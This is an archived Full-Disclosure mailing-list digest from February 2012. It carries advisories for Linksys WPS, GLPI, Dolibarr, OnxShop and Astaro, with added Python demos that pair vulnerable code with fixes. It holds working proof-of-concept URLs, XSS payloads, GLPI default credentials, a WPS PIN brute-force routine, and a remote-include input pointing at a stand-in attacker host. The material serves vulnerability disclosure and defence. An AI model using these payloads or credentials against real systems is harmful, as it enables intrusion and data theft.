[Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-10 Thread farthvader
Don't buy Linksys routers, they are vulnerable to the Wifi unProtected
Setup PIN registrar brute-force attack.
No patch or workaround exists at the making of this post.

Vulnerable list and alleged patch availability:
source: http://www6.nohold.net/Cisco2/ukp.aspx?vw=1&articleid=25154

 E1000  To Be Disclosed (aka we have no idea)
 E1000 v2  To Be Disclosed
 E1000 v2.1  To Be Disclosed
 E1200 v1 early March
 E1200 v2 early March
 E1500 early March
 E1550 mid March
 E2000 To Be Disclosed
 E2100L mid March
 E2500 early March
 E3000 To Be Disclosed 
 E3200 early March
 E4200 v1 early March
 E4200 v2 To Be Disclosed
 M10 To Be Disclosed
 M20 To Be Disclosed
 M20 v2 To Be Disclosed
 RE1000 early March
 WAG120N To Be Disclosed
 WAG160N To Be Disclosed
 WAG160N v2 To Be Disclosed
 WAG310G To Be Disclosed
 WAG320N To Be Disclosed
 WAG54G2 To Be Disclosed
 WAP610N To Be Disclosed
 WRT110 To Be Disclosed
 WRT120N To Be Disclosed
 WRT160N v1 To Be Disclosed
 WRT160N v2 To Be Disclosed
 WRT160N v3 To Be Disclosed
 WRT160NL To Be Disclosed
 WRT310N v1 To Be Disclosed
 WRT310N v2 To Be Disclosed
 WRT320N To Be Disclosed
 WRT400N To Be Disclosed
 WRT54G2 v1 To Be Disclosed
 WRT54G2 v1.3 To Be Disclosed
 WRT54G2 v1.5 To Be Disclosed
 WRT54GS2 v1 To Be Disclosed
 WRT610N v1 To Be Disclosed
 WRT610N v2 To Be Disclosed
 X2000 To Be Disclosed
 X2000 v2 To Be Disclosed
 X3000 To Be Disclosed

The question is why a big company like Cisco/Linksys hasn't released a
patch in almost a month and a half?

Well, I have circumstantial evidence that Cisco outsources some of their
Linksys router firmware to other companies (Arcadyan, for example); in
some cases source code is only available through NDAs or not
available at all. That's why they are taking so long to release a fix
for the WPS vulnerability. Fixing a vulnerability like this, with all
the bureaucratic, QA and legal process, shouldn't take more than 2
weeks. I found some GPL violations by the way, but this is beyond the
scope of this message (obfuscating firmware is useless, you know).

I apologize if I offended someone, but IT security is serious
business, especially if someone uses your wifi to commit crimes.
This vulnerability has public and very easy to use exploit code;
it's not a denial of service.
Farth Vader.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
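The attack the post refers to, as an added offline simulation (not code from the post, from Linksys, or from any public tool). The two-stage check it models comes from the public WPS PIN brute-force research: the registrar aborts after the first four PIN digits are verified and again after the next three, and the eighth digit is a checksum, so the search space is 10^4 + 10^3 instead of 10^8. MockRegistrar is a stand-in for the access point, the secret PIN 12345670 is constructed, and the model ignores any lockout the real AP might apply.

```python
"""WPS PIN registrar brute force, simulated against a mock access point.

Added example. The split verification modelled here (EAP-NACK after the first
half of the PIN, then after the second half) is the behaviour described in the
public WPS research; MockRegistrar is an assumption standing in for real AP
firmware, not a Linksys implementation.
"""
from typing import Optional


def wps_pin_checksum(pin7: int) -> int:
    """Checksum digit for a 7-digit PIN body (the WPS spec's weighted-sum rule)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: int) -> bool:
    """True if the 8-digit PIN's last digit is the checksum of the first seven."""
    return 0 <= pin < 10**8 and wps_pin_checksum(pin // 10) == pin % 10


def with_checksum(first4: int, mid3: int) -> str:
    """Build a checksum-valid 8-digit PIN string from its two brute-forced halves."""
    body = first4 * 1000 + mid3
    return f"{body:07d}{wps_pin_checksum(body)}"


class MockRegistrar:
    """Stand-in for the AP's WPS registrar (assumption: it leaks which half failed)."""

    def __init__(self, secret_pin: int) -> None:
        self._secret = f"{secret_pin:08d}"
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self._secret[:4]:
            return "NACK_M4"   # first half wrong: session aborted after M4
        if pin[4:] != self._secret[4:]:
            return "NACK_M6"   # first half right, second half wrong
        return "M7"            # both halves right: AP would now hand over the WPA key


def brute_force(reg: MockRegistrar) -> Optional[str]:
    """Recover the PIN in at most 10^4 + 10^3 = 11,000 attempts instead of 10^8."""
    first4 = None
    for cand in range(10_000):
        # any answer other than NACK_M4 means the first four digits matched
        if reg.try_pin(with_checksum(cand, 0)) != "NACK_M4":
            first4 = cand
            break
    if first4 is None:
        return None
    for mid3 in range(1_000):
        pin = with_checksum(first4, mid3)   # 7th digit free, 8th fixed by checksum
        if reg.try_pin(pin) == "M7":
            return pin
    return None


if __name__ == "__main__":
    reg = MockRegistrar(12345670)   # constructed secret PIN
    print(brute_force(reg), "recovered after", reg.attempts, "attempts")
```

For the constructed PIN the search finishes after 1,803 attempts; the worst case (a PIN starting 9999999) is exactly 11,000. Against a real AP each attempt is a full WPS exchange, so the practical limit is the AP's rate limiting or lockout, which this model does not include.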

[Full-disclosure] Celebrate with PenTest Magazine

2012-02-10 Thread Maciej Kozuszek
Celebrate with PenTest Magazine

To celebrate the transformation of the PenTest StarterKit edition into
Auditing & Standards PenTest, we've decided to give everyone access to 4
full PenTest issues for free.

All you need to do to download them is create a free account. Sign up as 
a free member here:

http://pentestmag.com/subscribe/

And after you activate your account, download all the issues here (click 
Full version download button):

PenTest StarterKit (3 issues):
http://pentestmag.com/pentest-starterkit-111/
http://pentestmag.com/pentest-starterkit-211-2/
http://pentestmag.com/pentest-starterkit-12012/
+
Special Social-Engineer.com PenTest Issue:
http://pentestmag.com/social-engineering-pentest-092012/

Enjoy the PenTest Fiesta!

PenTest Team
e...@pentestmag.com



Re: [Full-disclosure] posting xss notifications in sites vs software packages

2012-02-10 Thread Info
Well, in Germany... our law regarding security in general is very, very
vague.

It basically says that you have to go to prison if you produce or
publish any information and/or tools (for so-called hacking purposes)
in preparation for a criminal offense.
And: if you get unauthorized access to data which is specially secured
by evading the security mechanisms.

But the European Expert Group for IT Security says that especially the
first part does not apply if you're dealing with information and tools
in a good-natured way, using e.g. detailed reporting or documentation.
So I think it's hard to say if looking for a custom website
vulnerability (and finally not using it for bad purposes) is
illegal... at least it depends on how the judge defines criminal
offense and interprets your behavior.

@Valdis:
Therefore: agree :)

Regards
Julien.


On 02/09/2012 03:23 AM, valdis.kletni...@vt.edu wrote:
 On Wed, 08 Feb 2012 17:30:18 +0100, Info said:
 A general question: is it legal to search for XSS vulnerabilities on
 custom websites ?
 Yes. No. Maybe. Depends where you live, where the web server is physically
 located, and where the corporate headquarters are.  In the US, the law you
 need to worry about most is 18 USC 1030:

 http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_1030000-.html

 ... having knowingly accessed a computer without authorization or exceeding
 authorized access, and by means of such conduct having obtained 
 information...

 It's going to come down to whether the jury believes the prosecutor's version
 or your version of what exceeding authorized access means - which is why
 professional pen testers make sure they get a Get Out Of Jail Free card, and
 negotiate rules of engagement (what's allowed, what's not) as part of the
 contract.  You amateur pen testers are on your own. ;)



[Full-disclosure] CVE-2012-1037: GLPI = 0.80.61 LFI/RFI

2012-02-10 Thread Emilien Girault
CVE-2012-1037: GLPI = 0.80.61 LFI/RFI

Severity: Important

Vendor: GLPI - http://www.glpi-project.org

Versions Affected
=

All versions between 0.78 and 0.80.61

Description
===

GLPI fails to properly sanitize the GET 'sub_type' parameter in the 
front/popup.php file:

  [...]
  checkLoginUser();

  if (isset($_GET["popup"])) {
     $_SESSION["glpipopup"]["name"] = $_GET["popup"];
  }
 
  if (isset($_SESSION["glpipopup"]["name"])) {
    switch ($_SESSION["glpipopup"]["name"]) {
  [...]
    case "add_ruleparameter" :
       popHeader($LANG['ldap'][35], $_SERVER['PHP_SELF']);
       include strtolower($_GET['sub_type']."Parameter.php");   // <===
       break;
  [...]
  
To be triggered, the attacker needs to be authenticated. However, GLPI provides 
default accounts that often aren't changed or disabled:

glpi/glpi
tech/tech
normal/normal
post-only/postonly

Impact
==

Since there is a suffix, the vulnerability can be used as a RFI (requires 
allow_url_include = On).

For LFI, the target file has to end with parameter.php. GLPI automatically 
escapes all GET and POST parameters with addslashes(), so the null byte 
technique is not usable. I have not tested exploitation using the path truncation 
technique, but it might be possible.


Mitigation
==

Upgrade to GLPI 0.80.7.


Exploit
===

http://server/front/popup.php?popup=add_ruleparameter&sub_type=file


Timeline


08 feb 2012 - Found the bug.
09 feb 2012 - Contacted the GLPI Team.
09 feb 2012 - Bug fixed & new version available.

Thanks to the GLPI team for being responsive!

References
==

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1037
https://forge.indepnet.net/projects/glpi/versions/685
https://forge.indepnet.net/projects/glpi/repository/revisions/17457/diff/branches/0.80-bugfixes/front/popup.php


-- 
Emilien Girault

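What the vulnerable include line actually loads for a given sub_type, as an added Python re-enactment (not GLPI code): it mirrors `include strtolower($_GET['sub_type']."Parameter.php");` after GLPI's global addslashes() on GET data, shows why the suffix does not stop a remote include but does block null-byte truncation, and contrasts it with an allow-list. ALLOWED_SUB_TYPES and the attacker host are hypothetical.

```python
"""How the GLPI popup.php include resolves attacker-controlled input.

Added example. addslashes() is a Python port of the PHP function; the
allow-list in safe_include_target() is a hypothetical fix, not GLPI's patch.
"""
from urllib.parse import urlsplit

SUFFIX = "Parameter.php"   # appended by the vulnerable line, whole string then lowercased


def addslashes(s: str) -> str:
    """Python port of PHP addslashes(): backslash-escape ' \" \\ and NUL."""
    return (s.replace("\\", "\\\\")
             .replace("'", "\\'")
             .replace('"', '\\"')
             .replace("\0", "\\0"))


def vulnerable_include_target(sub_type: str) -> str:
    """The string the vulnerable line hands to include(), for a given GET sub_type."""
    return (addslashes(sub_type) + SUFFIX).lower()


def describe(target: str) -> dict:
    """Classify the include target the way PHP's stream wrappers would see it."""
    parts = urlsplit(target)
    if parts.scheme in ("http", "https", "ftp"):
        # Remote include: the mandatory suffix lands in the query string, so it
        # never constrains which remote file is fetched (needs allow_url_include=On).
        return {"kind": "remote", "path": parts.path, "query": parts.query}
    # Local include: the suffix stays part of the filename, so only files that
    # really end in "parameter.php" can be loaded; addslashes() has already
    # turned any NUL into a literal backslash-zero, so truncation is impossible.
    return {"kind": "local", "path": target, "contains_nul": "\0" in target}


ALLOWED_SUB_TYPES = {"ldap", "mailcollector"}   # hypothetical allow-list


def safe_include_target(sub_type: str) -> str:
    """Hardened version: only known names are ever turned into a file path."""
    if sub_type not in ALLOWED_SUB_TYPES:
        raise ValueError(f"unknown sub_type {sub_type!r}")
    return (sub_type + SUFFIX).lower()


if __name__ == "__main__":
    for value in ("ldap", "http://attacker.example/shell.php?", "../../../../etc/passwd\0"):
        print(repr(value), "->", describe(vulnerable_include_target(value)))
```

The trailing `?` in the remote case is what makes the suffix harmless: `http://attacker.example/shell.php?parameter.php` still fetches shell.php. The allow-list fix works because the request no longer decides the path at all, only which of a fixed set of files is loaded.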


[Full-disclosure] Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities

2012-02-10 Thread resea...@vulnerability-lab.com
Title:
==
Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities


Date:
=
2012-02-07


References:
===
http://www.vulnerability-lab.com/get_content.php?id=428


VL-ID:
=
428


Introduction:
=
Dolibarr ERP & CRM is a modern software to manage your company or foundation 
activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It's an 
opensource free software designed for small and medium companies, foundations 
and freelancers. You can install, use and distribute it as a standalone 
application or as a web application (on mutualized or dedicated server, or on 
SaaS or Cloud solutions) and use it with any devices (desktop, smartphone, tablet).

(Copy of the Vendor Homepage: http://www.dolibarr.org/)


Abstract:
=
Vulnerability-Lab researcher discovered multiple File Include Vulnerabilities 
in Dolibarr CMS v3.2.0 Alpha.


Report-Timeline:

2011-02-08: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

Multiple File Include Vulnerabilities are detected in Dolibarr Content 
Management System v3.2.0 Alpha.
The vulnerability allows a remote attacker or a local low-privileged user 
account to request local web-server or system files. Successful exploitation 
of the vulnerability results in dbms & application compromise.

Vulnerable Module(s):
[+] ?modulepart=project&file=
[+] ?action=create&actioncode=AC_RDV&contactid=1&socid=1&backtopage=


Picture(s):
../1.png
../2.png


Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers or local low 
privileged user accounts. For demonstration or to reproduce ...


http://xxx.com/document.php?modulepart=project&file=../[FILE INCLUDE VULNERABILITY!]

http://xxx.com/comm/action/fiche.php?action=create&actioncode=AC_RDV&contactid=1&socid=1&backtopage=../common/[FILE INCLUDE VULNERABILITY!]


Risk:
=
The security risk of the file include vulnerabilities is estimated as high(+).


Credits:

Vulnerability Research Laboratory - Benjamin Kunz Mejri & Ucha Gobejishvili 
(longrifle0x) 


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, 
of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified 
form is granted. All other rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2011|Vulnerability-Lab




-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com


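The traversal pattern behind the `file=../` and `backtopage=../common/` PoC URLs, and the containment check that closes it, as an added example. It is not Dolibarr's document.php: it models only the unsafe join the URLs imply, against a temporary directory tree constructed here (a served report, a secret file outside the document root, and a symlink pointing at it).

```python
"""Path traversal of the document.php?modulepart=project&file=../ kind, and its fix.

Added example, not Dolibarr code. The directory layout in demo() is constructed.
"""
import os
import tempfile


def read_document_vulnerable(base_dir: str, file_param: str) -> bytes:
    """Join and open, as the PoC URLs imply the application does.
    os.path.join() also discards base_dir entirely if file_param is absolute."""
    with open(os.path.join(base_dir, file_param), "rb") as fh:
        return fh.read()


def read_document_safe(base_dir: str, file_param: str) -> bytes:
    """Resolve symlinks and '..' first, then refuse anything outside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, file_param))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"{file_param!r} escapes the document root")
    with open(target, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed layout: <tmp>/documents/project/report.txt may be served;
    <tmp>/secret.txt, and a symlink to it inside the document root, may not."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = os.path.join(tmp, "documents")
        os.makedirs(os.path.join(docs, "project"))
        with open(os.path.join(docs, "project", "report.txt"), "wb") as fh:
            fh.write(b"quarterly report")
        with open(os.path.join(tmp, "secret.txt"), "wb") as fh:
            fh.write(b"db password")
        os.symlink(os.path.join(tmp, "secret.txt"), os.path.join(docs, "link.txt"))

        out = {
            "legit": read_document_safe(docs, "project/report.txt"),
            "vuln_traversal": read_document_vulnerable(docs, "../secret.txt"),
        }
        # the hardened reader must block all three ways of leaving the root
        for name, param in (("traversal", "../secret.txt"),
                            ("absolute", os.path.join(tmp, "secret.txt")),
                            ("symlink", "link.txt")):
            try:
                read_document_safe(docs, param)
                out["safe_" + name] = "served"
            except PermissionError:
                out["safe_" + name] = "blocked"
        return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Checking for the substring `..` is not enough: an absolute path or a symlink planted inside the document root contains no dot-dot at all, which is why the check compares canonical paths after realpath().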


[Full-disclosure] OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities

2012-02-10 Thread resea...@vulnerability-lab.com
Title:
==
OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities


Date:
=
2012-02-08


References:
===
http://www.vulnerability-lab.com/get_content.php?id=426


VL-ID:
=
426


Introduction:
=
Onxshop is not only a great CMS offering integrated in-context editing and full 
design freedom without the constraints of limiting templates, but it's also a 
stable ecommerce platform used in production environments since 2006. Flexible 
layout modules, which support nesting based on the Fibonacci sequence. Complete 
HTML/CSS framework, which allows you to use the same HTML and core CSS for 
multiple websites with different branding and designs. 

Simplified MVC paradigm using Model = Storage Access (SQL and PHP), View = 
Presentation to client (simple HTML engine), Controller = Handling actions 
(request processing in PHP to produce View). To put it simply, you will not see 
the $align option in Model or Controller, or the SQL query in Controller.
Flexible routing system which allows each component to be called on its own 
(useful for AJAX).
The option to rewrite each template, model or controller specifically for a 
project, so developers can add their own stamp to the system. Common components 
that are all built directly by our core team, which means that 99% of projects 
don't need to install external components. This eliminates problems with 
incompatible components (extensions/modules/plugins) which affect some CMS 
software. Behavioural targeting support in the core system and many other 
components. An all in one system - content management system, blog, product 
catalogue and checkout process all rolled into one. This allows users to share 
the same category system and media library across their product catalogue and 
blog articles, or include an “add to basket” button in blog posts about a 
product. There isn't any other web system in the universe which can do this 
with such ease.
One fulltext search for the CMS, eCommerce and blog. 

Onxshop is a new kind of Content Management System (Shop|eCommerce). Onxshop is 
currently used by more than 50 businesses around the world, and that figure is 
growing all the time.

(Copy of the Vendor Homepage: http://onxshop.com/)


Abstract:
=
Vulnerability-Lab Team discovered multiple web vulnerabilities in Onxshop's 
Content Management System v1.5.0.


Report-Timeline:

2012-02-09: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in 
Onxshop's Content Management System v1.5.0. 
The bug allows a remote attacker to implement malicious script code on the 
application side (persistent).
Successful exploitation of the vulnerability allows an attacker to manipulate 
modules/context (persistent) & can lead to session hijacking (user/mod/admin).


Vulnerable Module(s):
[+] Pages - Title
[+] Search - Keywords & Inputs
[+] Vochou

Pictures:
../1.png
../2.png
../3.png


Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers with medium required 
user interaction. For demonstration or to reproduce ...

1.
<tr id="node_id_1194">
<td><a onclick="openEdit('/popup/properties/1194/orig/page/88')" href="javascript:void(1194)" class="&#8203;&#8203;&#8203;&#8203;&#8203;<iframe a=" = onload='alert("VulnerabilityLab")' src="a"></td>
<td>page/default</td>
<td>0</td>
<td>0</td>
<td><div class="onxshop_page_properties"><a class="onxshop_delete" title="Delete default" href="#1194"><span>Delete</span></a></div></td></tr>
</tbody>
</table>


2.
<div id="breadCrumb">
   <a href="/reports">Reports</a> <span style="font-size:8px;"></span><span class="location">
   <img src="http://www.vulnerability-lab.com/gfx/partners/vlab.png;" onLoad="alert(1337);"></span>  [X]
</div>

...or

<option value="all">All Orders</option></select>
</span>
</div><div class="row search">

<span class="label"><label>Search query</label></span>
<span class="field">
&#8203;&#8203;&#8203;&#8203;&#8203;<input width="800" type="text" height="800" src="http://vulnerability-lab.com;" iframe="" value="" name="order-list-filter[query]" id="query"/> </span></div>

<div class="row registered_between">
<span class="label"><label>Created between</label></span>

<span class="field">
<input width="800" type="text" height="800" src="http://vulnerability-lab.com;" iframe="" value="" name="order-list-filter[created_from]" id="order-list-filter-created_from" class="text hasDatepicker"/> 
<input width="800" type="text" height="800" src="http://vulnerability-lab.com;" iframe="" value="" name="order-list-filter[created_to]" id="order-list-filter-created_to" class="text hasDatepicker"/> 

[Full-disclosure] Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities

2012-02-10 Thread resea...@vulnerability-lab.com
Title:
==
Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities


Date:
=
2012-02-09


References:
===
http://www.vulnerability-lab.com/get_content.php?id=427


VL-ID:
=
427


Introduction:
=
Dolibarr ERP & CRM is a modern software to manage your company or foundation 
activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It's an 
opensource free software designed for small and medium companies, foundations 
and freelancers. You can install, use and distribute it as a standalone 
application or as a web application (on mutualized or dedicated server, or on 
SaaS or Cloud solutions) and use it with any devices (desktop, smartphone, tablet).

(Copy of the Vendor Homepage: http://www.dolibarr.org/)


Abstract:
=
Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability in 
Dolibarr CMS v3.2.0 Alpha.


Report-Timeline:

2011-02-09: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple remote SQL Injection vulnerabilities are detected in Dolibarr Content 
Management System v3.2.0 Alpha.
The vulnerability allows a remote attacker or a local low-privileged user 
account to inject/execute their own SQL commands on the affected application 
dbms. Successful exploitation of the vulnerability results in dbms & 
application compromise.

Vulnerable Module(s):
[+] Member List
[+] Row ID


--- Error/Exception Logs ---
The system has detected a technical error.
This information may help in diagnosing the error:
Date: 20120209164847
Dolibarr: 3.2.0-alpha
Feature level: 0
PHP: 5.2.4-2ubuntu5.19
Server: Apache

Requested URL: /adherents/fiche.php?rowid=-1%27
Menu manager: eldy_backoffice.php

Database type manager: mysql
Last database request with error: SELECT d.rowid, d.civilite, 
d.prenom as firstname, d.nom as lastname, 
d.societe, d.fk_soc, d.statut, d.public, d.adresse as address, d.cp as zip, 
d.ville as town, d.note, d.email, d.phone, 
d.phone_perso, d.phone_mobile, d.login, d.pass, d.photo, d.fk_adherent_type, 
d.morphy, d.datec as datec, d.tms as datem, 
d.datefin as datefin, d.naiss as datenaiss, d.datevalid as datev, d.pays, 
d.fk_departement, p.rowid as country_id, p.code 
as country_code, p.libelle as country, dep.nom as state, dep.code_departement 
as state_code, t.libelle as type, t.cotisation 
as cotisation, u.rowid as user_id, u.login as user_login FROM llx_adherent_type 
as t, llx_adherent as d LEFT JOIN llx_c_pays 
as p ON d.pays = p.rowid LEFT JOIN llx_c_departements as dep ON 
d.fk_departement = dep.rowid LEFT JOIN llx_user as u ON d.rowid 
= u.fk_member WHERE d.fk_adherent_type = t.rowid AND d.entity = 1 AND 
d.rowid=-1\'
Return code of last database request with error: DB_ERROR_SYNTAX
Content of last database request with error: You have an error in your SQL 
syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 
'\'' at line 1

Message: You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version 
for the right syntax to use near '\'' at line 1



Picture(s):
../1.png
../2.png


Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers or local low 
privileged user accounts. For demonstration or to reproduce ...


1.1
1. Login to the panel
2. Open list.php
3. Enter the following example string on the members list: -%20`


1.2
http://demo.dolibarr.org/adherents/fiche.php?rowid=-1%27[SQL Injection Vulnerability!]


Risk:
=
The security risk of the SQL injection vulnerabilities is estimated as high(+).


Credits:

Vulnerability Research Laboratory - Benjamin Kunz Mejri & Ucha Gobejishvili


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, 
of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified 
form 
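Why `rowid=-1'` ends in the DB_ERROR_SYNTAX shown in the log, what a working injection against the same query shape looks like, and the fix, as an added example. It uses an in-memory SQLite table with two constructed llx_adherent rows; it is not Dolibarr's code, only the query shape visible in the error log (the raw GET value spliced into `WHERE d.rowid=`).

```python
"""rowid=-1' against a string-built query, and the parameterised replacement.

Added example, not Dolibarr code. The llx_adherent rows are constructed.
"""
import sqlite3
from typing import List, Tuple, Union


def _db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE llx_adherent (rowid INTEGER PRIMARY KEY, login TEXT, pass TEXT);
        INSERT INTO llx_adherent VALUES (1, 'alice', 'hunter2'), (2, 'bob', 'letmein');
    """)
    return con


def fetch_member_vulnerable(con: sqlite3.Connection, rowid: str) -> List[Tuple]:
    """String concatenation, the shape of the failing query in the advisory."""
    sql = f"SELECT d.rowid, d.login, d.pass FROM llx_adherent AS d WHERE d.rowid={rowid}"
    return con.execute(sql).fetchall()


def fetch_member_safe(con: sqlite3.Connection, rowid: str) -> List[Tuple]:
    """Type-check the identifier, then bind it: the DB never parses user input as SQL."""
    rid = int(rowid)   # raises ValueError for anything that is not an integer
    return con.execute(
        "SELECT d.rowid, d.login, d.pass FROM llx_adherent AS d WHERE d.rowid=?", (rid,)
    ).fetchall()


def probe(rowid: str, safe: bool) -> Union[List[Tuple], str]:
    """Run one request against a fresh database; return rows or the error class."""
    con = _db()
    try:
        return (fetch_member_safe if safe else fetch_member_vulnerable)(con, rowid)
    except sqlite3.OperationalError as exc:
        return f"DB_ERROR_SYNTAX: {exc}"          # what the advisory's error page shows
    except ValueError:
        return "rejected: rowid must be an integer"
    finally:
        con.close()


if __name__ == "__main__":
    for value in ("1", "-1'", "-1 OR 1=1"):
        print(f"{value!r:12} vulnerable -> {probe(value, safe=False)}")
        print(f"{value!r:12} safe       -> {probe(value, safe=True)}")
```

The stray quote only proves the parameter reaches the parser; `-1 OR 1=1` on the same query returns every member row, login and password column included, which is the actual exposure. Because rowid is numeric the value is not quoted in the SQL, so escaping quotes would not have helped; casting to int (or binding) does.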


[Full-disclosure] Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities

2012-02-10 Thread resea...@vulnerability-lab.com
Title:
==
Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities


Date:
=
2012-02-06



VL-ID:
=
418


Abstract:
=
Alexander Fuchs discovered 2 remote SQL Injection Vulnerabilities on the 
official website of Indianapolis Superbowl 2012 (US).


Status:

Verified by Laboratory


Severity:
=
High


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, 
of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified 
form is granted. All other rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab


-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com




[Full-disclosure] Astaro Security Gateway - bypass using whitelist domain pattern weakness

2012-02-10 Thread upsploit advisories
*Advisory Information*

Title: Astaro Security Gateway - bypass using whitelist domain pattern
weakness

upSploit Ref: UPS-2011-0041



*Advisory Summary*

Astaro Security Gateway's default Web Filtering Exceptions allow
specially-named domains to bypass security features of the firewall.

*Vendor*

Astaro


*Affected Software*

Astaro Security Gateway

Astaro Security Gateway hardware, software, and virtual appliances provide
full Unified Threat Management protection. All platforms include the
complete feature set and the same ease-of-use. - http://www.astaro.com/


*Description of Issue*

Astaro Security Gateway - Home edition was used, other versions may be
affected.

In the ASG WebAdmin console, choose Web Security, Web Filtering,
Exceptions. The following regular expressions form a default whitelist that
allow bypassing of the firewall's features at varying levels to achieve
compatibility (one would assume):

^https?://[A-Za-z0-9.-]*adobe.com/
^https?://[A-Za-z0-9.-]*apple.com/
^https?://[A-Za-z0-9.-]*windowsupdate.com/
^https?://[A-Za-z0-9.-]*microsoft.com/

However, a savvy attacker need only serve malware from a drive-by web site
named www.exampleadobe.com (which would match the first regular expression
above) and the features of the firewall that would be bypassed include:
Antivirus / Extension blocking / Content Removal / Authentication / URL
Filter.

The regular expressions need to be fixed to ensure the domain cannot be
prefixed with other letters.


*PoC*

Use of a domain name such as www.exampleadobe.com to serve up EICAR virus
(untested).

*Fix*

Update to the latest version


*Credits*

Timeless Prototype


*References*

http://www.astaro.com/
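The weakness in the default exception patterns and an anchored replacement, as an added example (not Astaro code). The four default regular expressions are copied from the advisory; `anchored_domain_pattern()` is this example's proposal, assuming the intended meaning was "this domain or any subdomain of it".

```python
"""Why the default ASG web-filter exceptions match attacker-chosen hosts, and a fix.

Added example. DEFAULT_EXCEPTIONS are the patterns quoted in the advisory;
FIXED_EXCEPTIONS are an assumed replacement, not a vendor patch.
"""
import re

DEFAULT_EXCEPTIONS = [
    r"^https?://[A-Za-z0-9.-]*adobe.com/",
    r"^https?://[A-Za-z0-9.-]*apple.com/",
    r"^https?://[A-Za-z0-9.-]*windowsupdate.com/",
    r"^https?://[A-Za-z0-9.-]*microsoft.com/",
]

TRUSTED_DOMAINS = ["adobe.com", "apple.com", "windowsupdate.com", "microsoft.com"]


def anchored_domain_pattern(domain: str) -> str:
    """Match exactly `domain` or `<labels>.domain`.

    Two fixes over the defaults: every prefix label must end in a literal dot,
    so 'exampleadobe.com' cannot match, and the dots inside the domain are
    escaped, so '.' no longer matches any character ('adobeXcom')."""
    return r"^https?://(?:[A-Za-z0-9-]+\.)*" + re.escape(domain) + r"/"


FIXED_EXCEPTIONS = [anchored_domain_pattern(d) for d in TRUSTED_DOMAINS]


def is_excepted(url: str, patterns) -> bool:
    """True if any whitelist pattern matches, i.e. the filter would be bypassed."""
    return any(re.match(p, url) for p in patterns)


def matches_default(url: str) -> bool:
    return is_excepted(url, DEFAULT_EXCEPTIONS)


def matches_fixed(url: str) -> bool:
    return is_excepted(url, FIXED_EXCEPTIONS)


if __name__ == "__main__":
    for url in ("http://www.exampleadobe.com/drive-by.exe",
                "http://adobeXcom/",
                "https://download.adobe.com/reader.exe",
                "http://adobe.com/",
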